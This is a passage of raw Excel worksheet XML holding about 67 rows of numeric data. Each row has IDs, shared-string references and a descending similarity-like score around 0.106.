      </c>
    </row>
    <row r="4409" ht="15.75" customHeight="1">
      <c r="A4409" s="1">
        <v>5403.0</v>
      </c>
      <c r="B4409" s="2">
        <v>4.5496637E7</v>
      </c>
      <c r="C4409" s="2" t="s">
        <v>4197</v>
      </c>
      <c r="D4409" s="2">
        <v>1.0</v>
      </c>
      <c r="E4409" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4409" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="4410" ht="15.75" customHeight="1">
      <c r="A4410" s="1">
        <v>6532.0</v>
      </c>
      <c r="B4410" s="2">
        <v>4.8828851E7</v>
      </c>
      <c r="C4410" s="2" t="s">
        <v>4198</v>
      </c>
      <c r="D4410" s="2">
        <v>1.0</v>
      </c>
      <c r="E4410" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4410" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="4411" ht="15.75" customHeight="1">
      <c r="A4411" s="1">
        <v>6827.0</v>
      </c>
      <c r="B4411" s="2">
        <v>4.9590546E7</v>
      </c>
      <c r="C4411" s="2" t="s">
        <v>4199</v>
      </c>
      <c r="D4411" s="2">
        <v>1.0</v>
      </c>
      <c r="E4411" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4411" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="4412" ht="15.75" customHeight="1">
      <c r="A4412" s="1">
        <v>9002.0</v>
      </c>
      <c r="B4412" s="2">
        <v>5.4969246E7</v>
      </c>
      <c r="C4412" s="2" t="s">
        <v>4200</v>
      </c>
      <c r="D4412" s="2">
        <v>1.0</v>
      </c>
      <c r="E4412" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4412" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="4413" ht="15.75" customHeight="1">
      <c r="A4413" s="1">
        <v>11150.0</v>
      </c>
      <c r="B4413" s="2">
        <v>1.9361679E7</v>
      </c>
      <c r="C4413" s="2" t="s">
        <v>4201</v>
      </c>
      <c r="D4413" s="2">
        <v>1.0</v>
      </c>
      <c r="E4413" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4413" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="4414" ht="15.75" customHeight="1">
      <c r="A4414" s="1">
        <v>12360.0</v>
      </c>
      <c r="B4414" s="2">
        <v>2.8719607E7</v>
      </c>
      <c r="C4414" s="2" t="s">
        <v>4202</v>
      </c>
      <c r="D4414" s="2">
        <v>1.0</v>
      </c>
      <c r="E4414" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4414" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="4415" ht="15.75" customHeight="1">
      <c r="A4415" s="1">
        <v>13397.0</v>
      </c>
      <c r="B4415" s="2">
        <v>3497868.0</v>
      </c>
      <c r="C4415" s="2" t="s">
        <v>4203</v>
      </c>
      <c r="D4415" s="2">
        <v>1.0</v>
      </c>
      <c r="E4415" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4415" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="4416" ht="15.75" customHeight="1">
      <c r="A4416" s="1">
        <v>15074.0</v>
      </c>
      <c r="B4416" s="2">
        <v>4.1728167E7</v>
      </c>
      <c r="C4416" s="2" t="s">
        <v>4204</v>
      </c>
      <c r="D4416" s="2">
        <v>1.0</v>
      </c>
      <c r="E4416" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4416" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="4417" ht="15.75" customHeight="1">
      <c r="A4417" s="1">
        <v>16581.0</v>
      </c>
      <c r="B4417" s="2">
        <v>4.6918342E7</v>
      </c>
      <c r="C4417" s="2" t="s">
        <v>4205</v>
      </c>
      <c r="D4417" s="2">
        <v>1.0</v>
      </c>
      <c r="E4417" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4417" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="4418" ht="15.75" customHeight="1">
      <c r="A4418" s="1">
        <v>17539.0</v>
      </c>
      <c r="B4418" s="2">
        <v>5.0125509E7</v>
      </c>
      <c r="C4418" s="2" t="s">
        <v>4206</v>
      </c>
      <c r="D4418" s="2">
        <v>1.0</v>
      </c>
      <c r="E4418" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4418" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="4419" ht="15.75" customHeight="1">
      <c r="A4419" s="1">
        <v>20019.0</v>
      </c>
      <c r="B4419" s="2">
        <v>6044407.0</v>
      </c>
      <c r="C4419" s="2" t="s">
        <v>4207</v>
      </c>
      <c r="D4419" s="2">
        <v>1.0</v>
      </c>
      <c r="E4419" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4419" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="4420" ht="15.75" customHeight="1">
      <c r="A4420" s="1">
        <v>21166.0</v>
      </c>
      <c r="B4420" s="2">
        <v>1.9010526E7</v>
      </c>
      <c r="C4420" s="2" t="s">
        <v>4208</v>
      </c>
      <c r="D4420" s="2">
        <v>1.0</v>
      </c>
      <c r="E4420" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4420" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="4421" ht="15.75" customHeight="1">
      <c r="A4421" s="1">
        <v>22118.0</v>
      </c>
      <c r="B4421" s="2">
        <v>3.0991305E7</v>
      </c>
      <c r="C4421" s="2" t="s">
        <v>4209</v>
      </c>
      <c r="D4421" s="2">
        <v>1.0</v>
      </c>
      <c r="E4421" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4421" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="4422" ht="15.75" customHeight="1">
      <c r="A4422" s="1">
        <v>24226.0</v>
      </c>
      <c r="B4422" s="2">
        <v>1.0435516E7</v>
      </c>
      <c r="C4422" s="2" t="s">
        <v>4210</v>
      </c>
      <c r="D4422" s="2">
        <v>1.0</v>
      </c>
      <c r="E4422" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4422" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="4423" ht="15.75" customHeight="1">
      <c r="A4423" s="1">
        <v>25852.0</v>
      </c>
      <c r="B4423" s="2">
        <v>1.4855614E7</v>
      </c>
      <c r="C4423" s="2" t="s">
        <v>4211</v>
      </c>
      <c r="D4423" s="2">
        <v>1.0</v>
      </c>
      <c r="E4423" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4423" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="4424" ht="15.75" customHeight="1">
      <c r="A4424" s="1">
        <v>26848.0</v>
      </c>
      <c r="B4424" s="2">
        <v>1.9010525E7</v>
      </c>
      <c r="C4424" s="2" t="s">
        <v>4208</v>
      </c>
      <c r="D4424" s="2">
        <v>1.0</v>
      </c>
      <c r="E4424" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4424" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="4425" ht="15.75" customHeight="1">
      <c r="A4425" s="1">
        <v>27221.0</v>
      </c>
      <c r="B4425" s="2">
        <v>2.0974162E7</v>
      </c>
      <c r="C4425" s="2" t="s">
        <v>4212</v>
      </c>
      <c r="D4425" s="2">
        <v>1.0</v>
      </c>
      <c r="E4425" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4425" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="4426" ht="15.75" customHeight="1">
      <c r="A4426" s="1">
        <v>27231.0</v>
      </c>
      <c r="B4426" s="2">
        <v>2.1047077E7</v>
      </c>
      <c r="C4426" s="2" t="s">
        <v>4213</v>
      </c>
      <c r="D4426" s="2">
        <v>1.0</v>
      </c>
      <c r="E4426" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4426" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="4427" ht="15.75" customHeight="1">
      <c r="A4427" s="1">
        <v>27748.0</v>
      </c>
      <c r="B4427" s="2">
        <v>2.3083293E7</v>
      </c>
      <c r="C4427" s="2" t="s">
        <v>4214</v>
      </c>
      <c r="D4427" s="2">
        <v>1.0</v>
      </c>
      <c r="E4427" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4427" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="4428" ht="15.75" customHeight="1">
      <c r="A4428" s="1">
        <v>28680.0</v>
      </c>
      <c r="B4428" s="2">
        <v>2.7574067E7</v>
      </c>
      <c r="C4428" s="2" t="s">
        <v>4215</v>
      </c>
      <c r="D4428" s="2">
        <v>1.0</v>
      </c>
      <c r="E4428" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4428" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="4429" ht="15.75" customHeight="1">
      <c r="A4429" s="1">
        <v>29266.0</v>
      </c>
      <c r="B4429" s="2">
        <v>3.0991304E7</v>
      </c>
      <c r="C4429" s="2" t="s">
        <v>4209</v>
      </c>
      <c r="D4429" s="2">
        <v>1.0</v>
      </c>
      <c r="E4429" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4429" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="4430" ht="15.75" customHeight="1">
      <c r="A4430" s="1">
        <v>30083.0</v>
      </c>
      <c r="B4430" s="2">
        <v>3632558.0</v>
      </c>
      <c r="C4430" s="2" t="s">
        <v>4216</v>
      </c>
      <c r="D4430" s="2">
        <v>1.0</v>
      </c>
      <c r="E4430" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4430" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="4431" ht="15.75" customHeight="1">
      <c r="A4431" s="1">
        <v>32381.0</v>
      </c>
      <c r="B4431" s="2">
        <v>5612215.0</v>
      </c>
      <c r="C4431" s="2" t="s">
        <v>4217</v>
      </c>
      <c r="D4431" s="2">
        <v>1.0</v>
      </c>
      <c r="E4431" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4431" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="4432" ht="15.75" customHeight="1">
      <c r="A4432" s="1">
        <v>33774.0</v>
      </c>
      <c r="B4432" s="2">
        <v>8674716.0</v>
      </c>
      <c r="C4432" s="2" t="s">
        <v>4218</v>
      </c>
      <c r="D4432" s="2">
        <v>1.0</v>
      </c>
      <c r="E4432" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4432" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="4433" ht="15.75" customHeight="1">
      <c r="A4433" s="1">
        <v>1000.0</v>
      </c>
      <c r="B4433" s="2">
        <v>2.2931425E7</v>
      </c>
      <c r="C4433" s="2" t="s">
        <v>4219</v>
      </c>
      <c r="D4433" s="2">
        <v>1.0</v>
      </c>
      <c r="E4433" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4433" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="4434" ht="15.75" customHeight="1">
      <c r="A4434" s="1">
        <v>10893.0</v>
      </c>
      <c r="B4434" s="2">
        <v>1.6574691E7</v>
      </c>
      <c r="C4434" s="2" t="s">
        <v>4220</v>
      </c>
      <c r="D4434" s="2">
        <v>1.0</v>
      </c>
      <c r="E4434" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4434" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="4435" ht="15.75" customHeight="1">
      <c r="A4435" s="1">
        <v>11051.0</v>
      </c>
      <c r="B4435" s="2">
        <v>1.81641E7</v>
      </c>
      <c r="C4435" s="2" t="s">
        <v>4221</v>
      </c>
      <c r="D4435" s="2">
        <v>1.0</v>
      </c>
      <c r="E4435" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4435" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="4436" ht="15.75" customHeight="1">
      <c r="A4436" s="1">
        <v>15047.0</v>
      </c>
      <c r="B4436" s="2">
        <v>4.1612859E7</v>
      </c>
      <c r="C4436" s="2" t="s">
        <v>4222</v>
      </c>
      <c r="D4436" s="2">
        <v>1.0</v>
      </c>
      <c r="E4436" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4436" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="4437" ht="15.75" customHeight="1">
      <c r="A4437" s="1">
        <v>18472.0</v>
      </c>
      <c r="B4437" s="2">
        <v>5.2848403E7</v>
      </c>
      <c r="C4437" s="2" t="s">
        <v>4223</v>
      </c>
      <c r="D4437" s="2">
        <v>1.0</v>
      </c>
      <c r="E4437" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4437" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="4438" ht="15.75" customHeight="1">
      <c r="A4438" s="1">
        <v>18480.0</v>
      </c>
      <c r="B4438" s="2">
        <v>5.288546E7</v>
      </c>
      <c r="C4438" s="2" t="s">
        <v>4224</v>
      </c>
      <c r="D4438" s="2">
        <v>1.0</v>
      </c>
      <c r="E4438" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4438" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="4439" ht="15.75" customHeight="1">
      <c r="A4439" s="1">
        <v>18891.0</v>
      </c>
      <c r="B4439" s="2">
        <v>5.4120729E7</v>
      </c>
      <c r="C4439" s="2" t="s">
        <v>4225</v>
      </c>
      <c r="D4439" s="2">
        <v>1.0</v>
      </c>
      <c r="E4439" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4439" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="4440" ht="15.75" customHeight="1">
      <c r="A4440" s="1">
        <v>22116.0</v>
      </c>
      <c r="B4440" s="2">
        <v>3.0976687E7</v>
      </c>
      <c r="C4440" s="2" t="s">
        <v>4226</v>
      </c>
      <c r="D4440" s="2">
        <v>1.0</v>
      </c>
      <c r="E4440" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4440" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="4441" ht="15.75" customHeight="1">
      <c r="A4441" s="1">
        <v>23214.0</v>
      </c>
      <c r="B4441" s="2">
        <v>5.2728223E7</v>
      </c>
      <c r="C4441" s="2" t="s">
        <v>4227</v>
      </c>
      <c r="D4441" s="2">
        <v>1.0</v>
      </c>
      <c r="E4441" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4441" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="4442" ht="15.75" customHeight="1">
      <c r="A4442" s="1">
        <v>481.0</v>
      </c>
      <c r="B4442" s="2">
        <v>1.7492345E7</v>
      </c>
      <c r="C4442" s="2" t="s">
        <v>4228</v>
      </c>
      <c r="D4442" s="2">
        <v>1.0</v>
      </c>
      <c r="E4442" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4442" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="4443" ht="15.75" customHeight="1">
      <c r="A4443" s="1">
        <v>1279.0</v>
      </c>
      <c r="B4443" s="2">
        <v>2.5500412E7</v>
      </c>
      <c r="C4443" s="2" t="s">
        <v>4229</v>
      </c>
      <c r="D4443" s="2">
        <v>1.0</v>
      </c>
      <c r="E4443" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4443" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="4444" ht="15.75" customHeight="1">
      <c r="A4444" s="1">
        <v>1306.0</v>
      </c>
      <c r="B4444" s="2">
        <v>2.5695973E7</v>
      </c>
      <c r="C4444" s="2" t="s">
        <v>4230</v>
      </c>
      <c r="D4444" s="2">
        <v>1.0</v>
      </c>
      <c r="E4444" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4444" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="4445" ht="15.75" customHeight="1">
      <c r="A4445" s="1">
        <v>7160.0</v>
      </c>
      <c r="B4445" s="2">
        <v>5.0489448E7</v>
      </c>
      <c r="C4445" s="2" t="s">
        <v>4231</v>
      </c>
      <c r="D4445" s="2">
        <v>1.0</v>
      </c>
      <c r="E4445" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4445" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="4446" ht="15.75" customHeight="1">
      <c r="A4446" s="1">
        <v>17616.0</v>
      </c>
      <c r="B4446" s="2">
        <v>5.0360815E7</v>
      </c>
      <c r="C4446" s="2" t="s">
        <v>4232</v>
      </c>
      <c r="D4446" s="2">
        <v>1.0</v>
      </c>
      <c r="E4446" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4446" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="4447" ht="15.75" customHeight="1">
      <c r="A4447" s="1">
        <v>18777.0</v>
      </c>
      <c r="B4447" s="2">
        <v>5.3802869E7</v>
      </c>
      <c r="C4447" s="2" t="s">
        <v>4233</v>
      </c>
      <c r="D4447" s="2">
        <v>1.0</v>
      </c>
      <c r="E4447" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4447" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="4448" ht="15.75" customHeight="1">
      <c r="A4448" s="1">
        <v>19222.0</v>
      </c>
      <c r="B4448" s="2">
        <v>5.5026947E7</v>
      </c>
      <c r="C4448" s="2" t="s">
        <v>4234</v>
      </c>
      <c r="D4448" s="2">
        <v>1.0</v>
      </c>
      <c r="E4448" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4448" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="4449" ht="15.75" customHeight="1">
      <c r="A4449" s="1">
        <v>100.0</v>
      </c>
      <c r="B4449" s="2">
        <v>1.2627808E7</v>
      </c>
      <c r="C4449" s="2" t="s">
        <v>4235</v>
      </c>
      <c r="D4449" s="2">
        <v>1.0</v>
      </c>
      <c r="E4449" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4449" s="2">
        <v>0.1062378167641325</v>
      </c>
    </row>
    <row r="4450" ht="15.75" customHeight="1">
      <c r="A4450" s="1">
        <v>7109.0</v>
      </c>
      <c r="B4450" s="2">
        <v>5.0350519E7</v>
      </c>
      <c r="C4450" s="2" t="s">
        <v>4236</v>
      </c>
      <c r="D4450" s="2">
        <v>1.0</v>
      </c>
      <c r="E4450" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4450" s="2">
        <v>0.1062378167641325</v>
      </c>
    </row>
    <row r="4451" ht="15.75" customHeight="1">
      <c r="A4451" s="1">
        <v>1423.0</v>
      </c>
      <c r="B4451" s="2">
        <v>2.6568255E7</v>
      </c>
      <c r="C4451" s="2" t="s">
        <v>4237</v>
      </c>
      <c r="D4451" s="2">
        <v>1.0</v>
      </c>
      <c r="E4451" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4451" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="4452" ht="15.75" customHeight="1">
      <c r="A4452" s="1">
        <v>2824.0</v>
      </c>
      <c r="B4452" s="2">
        <v>3.5395562E7</v>
      </c>
      <c r="C4452" s="2" t="s">
        <v>4238</v>
      </c>
      <c r="D4452" s="2">
        <v>1.0</v>
      </c>
      <c r="E4452" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4452" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="4453" ht="15.75" customHeight="1">
      <c r="A4453" s="1">
        <v>6912.0</v>
      </c>
      <c r="B4453" s="2">
        <v>4.9846293E7</v>
      </c>
      <c r="C4453" s="2" t="s">
        <v>4239</v>
      </c>
      <c r="D4453" s="2">
        <v>1.0</v>
      </c>
      <c r="E4453" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4453" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="4454" ht="15.75" customHeight="1">
      <c r="A4454" s="1">
        <v>7528.0</v>
      </c>
      <c r="B4454" s="2">
        <v>5.1457893E7</v>
      </c>
      <c r="C4454" s="2" t="s">
        <v>4240</v>
      </c>
      <c r="D4454" s="2">
        <v>1.0</v>
      </c>
      <c r="E4454" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4454" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="4455" ht="15.75" customHeight="1">
      <c r="A4455" s="1">
        <v>16093.0</v>
      </c>
      <c r="B4455" s="2">
        <v>4.5386812E7</v>
      </c>
      <c r="C4455" s="2" t="s">
        <v>4241</v>
      </c>
      <c r="D4455" s="2">
        <v>1.0</v>
      </c>
      <c r="E4455" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4455" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="4456" ht="15.75" customHeight="1">
      <c r="A4456" s="1">
        <v>16691.0</v>
      </c>
      <c r="B4456" s="2">
        <v>4.7330704E7</v>
      </c>
      <c r="C4456" s="2" t="s">
        <v>4242</v>
      </c>
      <c r="D4456" s="2">
        <v>1.0</v>
      </c>
      <c r="E4456" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4456" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="4457" ht="15.75" customHeight="1">
      <c r="A4457" s="1">
        <v>7213.0</v>
      </c>
      <c r="B4457" s="2">
        <v>5.0624709E7</v>
      </c>
      <c r="C4457" s="2" t="s">
        <v>4243</v>
      </c>
      <c r="D4457" s="2">
        <v>1.0</v>
      </c>
      <c r="E4457" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4457" s="2">
        <v>0.1060606060606061</v>
      </c>
    </row>
    <row r="4458" ht="15.75" customHeight="1">
      <c r="A4458" s="1">
        <v>19860.0</v>
      </c>
      <c r="B4458" s="2">
        <v>5.7157418E7</v>
      </c>
      <c r="C4458" s="2" t="s">
        <v>4244</v>
      </c>
      <c r="D4458" s="2">
        <v>1.0</v>
      </c>
      <c r="E4458" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4458" s="2">
        <v>0.1060606060606061</v>
      </c>
    </row>
    <row r="4459" ht="15.75" customHeight="1">
      <c r="A4459" s="1">
        <v>1491.0</v>
      </c>
      <c r="B4459" s="2">
        <v>2.7199828E7</v>
      </c>
      <c r="C4459" s="2" t="s">
        <v>4245</v>
      </c>
      <c r="D4459" s="2">
        <v>1.0</v>
      </c>
      <c r="E4459" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4459" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="4460" ht="15.75" customHeight="1">
      <c r="A4460" s="1">
        <v>5809.0</v>
      </c>
      <c r="B4460" s="2">
        <v>4.6809013E7</v>
      </c>
      <c r="C4460" s="2" t="s">
        <v>4246</v>
      </c>
      <c r="D4460" s="2">
        <v>1.0</v>
      </c>
      <c r="E4460" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4460" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="4461" ht="15.75" customHeight="1">
      <c r="A4461" s="1">
        <v>7024.0</v>
      </c>
      <c r="B4461" s="2">
        <v>5.0109962E7</v>
      </c>
      <c r="C4461" s="2" t="s">
        <v>4247</v>
      </c>
      <c r="D4461" s="2">
        <v>1.0</v>
      </c>
      <c r="E4461" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4461" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="4462" ht="15.75" customHeight="1">
      <c r="A4462" s="1">
        <v>8388.0</v>
      </c>
      <c r="B4462" s="2">
        <v>5.3826696E7</v>
      </c>
      <c r="C4462" s="2" t="s">
        <v>4248</v>
      </c>
      <c r="D4462" s="2">
        <v>1.0</v>
      </c>
      <c r="E4462" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4462" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="4463" ht="15.75" customHeight="1">
      <c r="A4463" s="1">
        <v>9508.0</v>
      </c>
      <c r="B4463" s="2">
        <v>5.5946876E7</v>
      </c>
      <c r="C4463" s="2" t="s">
        <v>4249</v>
      </c>
      <c r="D4463" s="2">
        <v>1.0</v>
      </c>
      <c r="E4463" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4463" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="4464" ht="15.75" customHeight="1">
      <c r="A4464" s="1">
        <v>11338.0</v>
      </c>
      <c r="B4464" s="2">
        <v>2.1199851E7</v>
      </c>
      <c r="C4464" s="2" t="s">
        <v>4250</v>
      </c>
      <c r="D4464" s="2">
        <v>1.0</v>
      </c>
      <c r="E4464" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4464" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="4465" ht="15.75" customHeight="1">
      <c r="A4465" s="1">
        <v>11433.0</v>
      </c>
      <c r="B4465" s="2">
        <v>2.1749521E7</v>
      </c>
      <c r="C4465" s="2" t="s">
        <v>4251</v>
      </c>
      <c r="D4465" s="2">
        <v>1.0</v>
      </c>
      <c r="E4465" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4465" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="4466" ht="15.75" customHeight="1">
      <c r="A4466" s="1">
        <v>11513.0</v>
      </c>
      <c r="B4466" s="2">
        <v>2.2289819E7</v>
      </c>
      <c r="C4466" s="2" t="s">
        <v>4252</v>
      </c>
      <c r="D4466" s="2">
        <v>1.0</v>
      </c>
      <c r="E4466" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4466" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="4467" ht="15.75" customHeight="1">
      <c r="A4467" s="1">
        <v>11782.0</v>
      </c>
      <c r="B4467" s="2">
        <v>2.4301488E7</v>
      </c>
      <c r="C4467" s="2" t="s">
        <v>4253</v>
      </c>
      <c r="D4467" s="2">
        <v>1.0</v>
      </c>
      <c r="E4467" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4467" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="4468" ht="15.75" customHeight="1">
      <c r="A4468" s="1">
        <v>11872.0</v>
      </c>
      <c r="B4468" s="2">
        <v>2.4921318E7</v>
      </c>
      <c r="C4468" s="2" t="s">
        <v>4254</v>
      </c>
      <c r="D4468" s="2">
        <v>1.0</v>
      </c>
      <c r="E4468" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4468" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="4469" ht="15.75" customHeight="1">
      <c r="A4469" s="1">
        <v>13402.0</v>
      </c>
      <c r="B4469" s="2">
        <v>3.4990126E7</v>
      </c>
      <c r="C4469" s="2" t="s">
        <v>4255</v>
      </c>
      <c r="D4469" s="2">
        <v>1.0</v>
      </c>
      <c r="E4469" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4469" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="4470" ht="15.75" customHeight="1">
      <c r="A4470" s="1">
        <v>14156.0</v>
      </c>
      <c r="B4470" s="2">
        <v>3.8000963E7</v>
      </c>
      <c r="C4470" s="2" t="s">
        <v>4256</v>
      </c>
      <c r="D4470" s="2">
        <v>1.0</v>
      </c>
      <c r="E4470" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4470" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="4471" ht="15.75" customHeight="1">
      <c r="A4471" s="1">
        <v>23505.0</v>
      </c>
      <c r="B4471" s="2">
        <v>5783603.0</v>
      </c>
      <c r="C4471" s="2" t="s">
        <v>4257</v>
      </c>
      <c r="D4471" s="2">
        <v>1.0</v>
      </c>
      <c r="E4471" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4471" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="4472" ht="15.75" customHeight="1">
      <c r="A4472" s="1">
        <v>764.0</v>
      </c>
      <c r="B4472" s="2">
        <v>2.1049912E7</v>
      </c>
      <c r="C4472" s="2" t="s">
        <v>4258</v>
      </c>
      <c r="D4472" s="2">
        <v>1.0</v>
      </c>
      <c r="E4472" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4472" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="4473" ht="15.75" customHeight="1">
      <c r="A4473" s="1">
        <v>1760.0</v>
      </c>
      <c r="B4473" s="2">
        <v>2.8926625E7</v>
      </c>
      <c r="C4473" s="2" t="s">
        <v>4259</v>
      </c>
      <c r="D4473" s="2">
        <v>1.0</v>
      </c>
      <c r="E4473" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4473" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="4474" ht="15.75" customHeight="1">
      <c r="A4474" s="1">
        <v>4988.0</v>
      </c>
      <c r="B4474" s="2">
        <v>4.4143921E7</v>
      </c>
      <c r="C4474" s="2" t="s">
        <v>4260</v>
      </c>
      <c r="D4474" s="2">
        <v>1.0</v>
      </c>
      <c r="E4474" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4474" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="4475" ht="15.75" customHeight="1">
      <c r="A4475" s="1">
        <v>6834.0</v>
      </c>
      <c r="B4475" s="2">
        <v>4.9596959E7</v>
      </c>
      <c r="C4475" s="2" t="s">
        <v>4261</v>
      </c>
      <c r="D4475" s="2">
        <v>1.0</v>
      </c>
      <c r="E4475" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4475" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
